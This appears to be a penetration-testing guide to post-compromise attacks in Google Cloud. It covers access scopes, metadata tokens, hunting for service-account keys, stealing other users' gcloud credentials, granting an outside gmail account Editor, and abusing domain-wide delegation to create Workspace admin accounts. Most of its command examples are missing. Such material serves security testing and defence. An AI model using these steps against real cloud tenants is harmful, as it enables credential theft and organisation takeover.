Google Cloud uses a Resource hierarchy that is similar, conceptually, to that of a traditional filesystem. This provides a logical parent/child workflow with specific attachment points for policies and permissions.
At a high level, it looks like this:
A virtual machine (called a Compute Instance) is a resource. A resource resides in a project, probably alongside other Compute Instances, storage buckets, etc.
There are three types of roles in IAM:
Basic/Primitive roles, which include the Owner, Editor, and Viewer roles that existed prior to the introduction of IAM.
Predefined roles, which provide granular access for a specific service and are managed by Google Cloud. There are a lot of predefined roles, you can see all of them with the privileges they have here.
Custom roles, which provide granular access according to a user-specified list of permissions.
There are thousands of permissions in GCP. In order to check if a role has a permissions you can search the permission here and see which roles have it.
Virtual machine instances are usually assigned a service account. Every GCP project has a default service account, and this will be assigned to new Compute Instances unless otherwise specified. Administrators can choose to use either a custom account or no account at all. This service account can be used by any user or application on the machine to communicate with the Google APIs. You can run the following command to see what accounts are available to you:
gcloud auth list
Default service accounts will look like one of the following:
If gcloud auth list returns multiple accounts available, something interesting is going on. You should generally see only the service account. If there is more than one, you can cycle through each using gcloud config set account [ACCOUNT] while trying the various tasks in this blog.
The service account on a GCP Compute Instance will useOAuth to communicate with the Google Cloud APIs. When access scopes are used, the OAuth token that is generated for the instance will have a scope limitation included. This defines what API endpoints it can authenticate to. It does NOT define the actual permissions.
When using a custom service account, Google recommends that access scopes are not used and to rely totally on IAM. The web management portal actually enforces this, but access scopes can still be applied to instances using custom service accounts programatically.
There are three options when setting an access scope on a VM instance:
Allow default access
All full access to all cloud APIs
Set access for each API
You can see what scopes are assigned by querying the metadata URL. Here is an example from a VM with "default" access assigned:
The most interesting thing in the defaultscope is devstorage.read_only. This grants read access to all storage buckets in the project. This can be devastating, which of course is great for us as an attacker.
Here is what you'll see from an instance with no scope limitations:
This cloud-platform scope is what we are really hoping for, as it will allow us to authenticate to any API function and leverage the full power of our assigned IAM permissions.
It is possible to encounter some conflicts when using both IAM and access scopes. For example, your service account may have the IAM role of compute.instanceAdmin but the instance you've breached has been crippled with the scope limitation of https://www.googleapis.com/auth/compute.readonly. This would prevent you from making any changes using the OAuth token that's automatically assigned to your instance.
Default service account token
The metadata server available to a given instance will provide any user/process on that instance with an OAuth token that is automatically used as the default credentials when communicating with Google APIs via the gcloud command.
You can retrieve and inspect the token with the following curl command:
This token is the combination of the service account and access scopes assigned to the Compute Instance. So, even though your service account may have every IAM privilege imaginable, this particular OAuth token might be limited in the APIs it can communicate with due to access scopes.
Application default credentials
When using one of Google's official GCP client libraries, the code will automatically go searching for credentials following a strategy called Application Default Credentials.
First, it will check would be the source code itself. Developers can choose to statically point to a service account key file.
The next is an environment variable called GOOGLE_APPLICATION_CREDENTIALS. This can be set to point to a service account key file.
Finally, if neither of these are provided, the application will revert to using the default token provided by the metadata server as described in the section above.
Finding the actual JSON file with the service account credentials is generally much moredesirable than relying on the OAuth token on the metadata server. This is because the raw service account credentials can be activated without the burden of access scopes and without the short expiration period usually applied to the tokens.
Each GCP project is provided with a VPC called default, which applies the following rules to all instances:
default-allow-internal (allow all traffic from other instances on the default network)
default-allow-ssh (allow 22 from everywhere)
default-allow-rdp (allow 3389 from everywhere)
default-allow-icmp (allow ping from everywhere)
Meet the neighbors
Firewall rules may be more permissive for internal IP addresses. This is especially true for the default VPC, which permits all traffic between Compute Instances.
You can get a nice readable view of all the subnets in the current project with the following command:
gcloud compute networks subnets list
And an overview of all the internal/external IP addresses of the Compute Instances using the following:
gcloud compute instances list
If you go crazy with nmap from a Compute Instance, Google will notice and will likely send an alert email to the project owner. This is more likely to happen if you are scanning public IP addresses outside of your current project. Tread carefully.
Enumerating public ports
Perhaps you've been unable to leverage your current access to move through the project internally, but you DO have read access to the compute API. It's worth enumerating all the instances with firewall ports open to the world - you might find an insecure application to breach and hope you land in a more powerful position.
In the section above, you've gathered a list of all the public IP addresses. You could run nmap against them all, but this may taken ages and could get your source IP blocked.
When attacking from the internet, the default rules don't provide any quick wins on properly configured machines. It's worth checking for password authentication on SSH and weak passwords on RDP, of course, but that's a given.
What we are really interested in is other firewall rules that have been intentionally applied to an instance. If we're lucky, we'll stumble over an insecure application, an admin interface with a default password, or anything else we can exploit.
Firewall rules can be applied to instances via the following methods:
Unfortunately, there isn't a simple gcloud command to spit out all Compute Instances with open ports on the internet. You have to connect the dots between firewall rules, network tags, services accounts, and instances.
The most common way once you have obtained some cloud credentials of has compromised some service running inside a cloud is to abuse miss-configured privileges the compromised account may have. So, the first thing you should do is to enumerate your privileges.
Moreover, during this enumeration, remember that permissions can be set at the highest level of "Organization" as well.
Bypassing access scopes
When access scopes are used, the OAuth token that is generated for the computing instance (VM) will have a scope limitation included. However, you might be able to bypass this limitation and exploit the permissions the compromised account has.
The best way to bypass this restriction is either to find new credentials in the compromised host, to find the service key to generate an OUATH token without restriction or to jump to a different VM less restricted.
Pop another box
It's possible that another box in the environment exists with less restrictive access scopes. If you can view the output of gcloud compute instances list --quiet --format=json, look for instances with either the specific scope you want or the auth/cloud-platform all-inclusive scope.
Also keep an eye out for instances that have the default service account assigned ([email protected]).
Therefore, if you find a service account keystored on the instance you can bypass the limitation. These are RSA private keys that can be used to authenticate to the Google Cloud API and request a new OAuth token with no scope limitations.
Check if any service account has exported a key at some point with:
foriin$(gcloud iam service-accounts list --format="table[no-heading](email)");do
echo Looking for keys for$i:
gcloud iam service-accounts keys list --iam-account $i
These files are not stored on a Compute Instance by default, so you'd have to be lucky to encounter them. The default name for the file is [project-id]-[portion-of-key-id].json. So, if your project name is test-project then you can search the filesystem for test-project*.json looking for this key file.
The contents of the file look something like this:
You should see https://www.googleapis.com/auth/cloud-platform listed in the scopes, which means you are not limited by any instance-level access scopes. You now have full power to use all of your assigned IAM permissions.
Steal gcloud authorizations
It's quite possible that other users on the same box have been running gcloud commands using an account more powerful than your own. You'll need local root to do this.
First, find what gcloud config directories exist in users' home folders.
$ sudo find / -name "gcloud"
You can manually inspect the files inside, but these are generally the ones with the secrets:
Now, you have the option of looking for clear text credentials in these files or simply copying the entire gcloud folder to a machine you control and running gcloud auth list to see what accounts are now available to you.
Service account impersonation
Impersonating a service account can be very useful to obtain new and better privileges.
Authentication using RSA private keys (covered above)
Authorization using Cloud IAM policies (covered here)
Deploying jobs on GCP services (more applicable to the compromise of a user account)
Granting access to management console
Access to the GCP management console is provided to user accounts, not service accounts. To log in to the web interface, you can grant access to a Google account that you control. This can be a generic "@gmail.com" account, it does not have to be a member of the target organization.
To grant the primitive role of Owner to a generic "@gmail.com" account, though, you'll need to use the web console. gcloud will error out if you try to grant it a permission above Editor.
You can use the following command to grant a user the primitive role of Editor to your existing project:
If you succeeded here, try accessing the web interface and exploring from there.
This is the highest level you can assign using the gcloud tool.
Spreading to Workspace via domain-wide delegation of authority
Workspace is Google's collaboration and productivity platform which consists of things like Gmail, Google Calendar, Google Drive, Google Docs, etc.
Service accounts in GCP can be granted the rights to programatically access user data in Workspace by impersonating legitimate users. This is known as domain-wide delegation. This includes actions like readingemail in GMail, accessing Google Docs, and even creating new user accounts in the G Suite organization.
Workspace has its own API, completely separate from GCP. Permissions are granted to Workspace and there isn't any default relation between GCP and Workspace.
However, it's possible to give a service account permissions over a Workspace user. If you have access to the Web UI at this point, you can browse to IAM -> Service Accounts and see if any of the accounts have "Enabled" listed under the "domain-wide delegation" column. The column itself may not appear if no accounts are enabled (you can read the details of each service account to confirm this). As of this writing, there is no way to do this programatically, although there is a request for this feature in Google's bug tracker.
To create this relation it's needed to enable it in GCP and also in Workforce.
Test Workspace access
To test this access you'll need the service account credentials exported in JSON format. You may have acquired these in an earlier step, or you may have the access required now to create a key for a service account you know to have domain-wide delegation enabled.
This topic is a bit tricky… your service account has something called a "client_email" which you can see in the JSON credential file you export. It probably looks something like [email protected]. If you try to access Workforce API calls directly with that email, even with delegation enabled, you will fail. This is because the Workforce directory will not include the GCP service account's email addresses. Instead, to interact with Workforce, we need to actually impersonate valid Workforce users.
What you really want to do is to impersonate a user with administrative access, and then use that access to do something like reset a password, disable multi-factor authentication, or just create yourself a shiny new admin account.
Gitlab've created this Python script that can do two things - list the user directory and create a new administrative account. Here is how you would use it:
You can try this script across a range of email addresses to impersonate varioususers. Standard output will indicate whether or not the service account has access to Workforce, and will include a random password for the new admin account if one is created.
If you have success creating a new admin account, you can log on to the Google admin console and have full control over everything in G Suite for every user - email, docs, calendar, etc. Go wild.